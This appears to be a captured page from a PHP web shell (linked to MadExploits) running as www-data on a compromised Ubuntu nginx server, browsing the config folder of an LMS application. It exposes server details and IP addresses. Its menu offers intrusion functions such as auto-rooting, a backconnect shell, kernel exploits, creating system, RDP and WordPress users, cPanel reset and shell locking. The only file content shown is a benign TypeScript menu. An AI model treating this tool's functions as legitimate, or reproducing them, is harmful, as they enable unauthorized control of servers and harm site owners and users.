Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
containers /
front /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
authorized.route.tsx
585
B
-rw-r--r--
menus.front.tsx
620
B
-rw-r--r--
routes.front.tsx
1.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menus.front.tsx
export interface MenuItem { icon?: string | JSX.Element; text: string; link?: string; description?: string; children?: MenuItem[]; } const routes: MenuItem[] = [ { icon: 'fas fa-tachometer-alt', text: 'Dashboard', description: '', link: '/admin/dashboard', }, { icon: 'fa fa-list', text: 'Account', description: '', link: '/admin/account/pending/list', }, { icon: 'fas fa-users', text: 'Manage Users', description: '', link: '/admin/user/all/list', }, ]; export default routes;
Close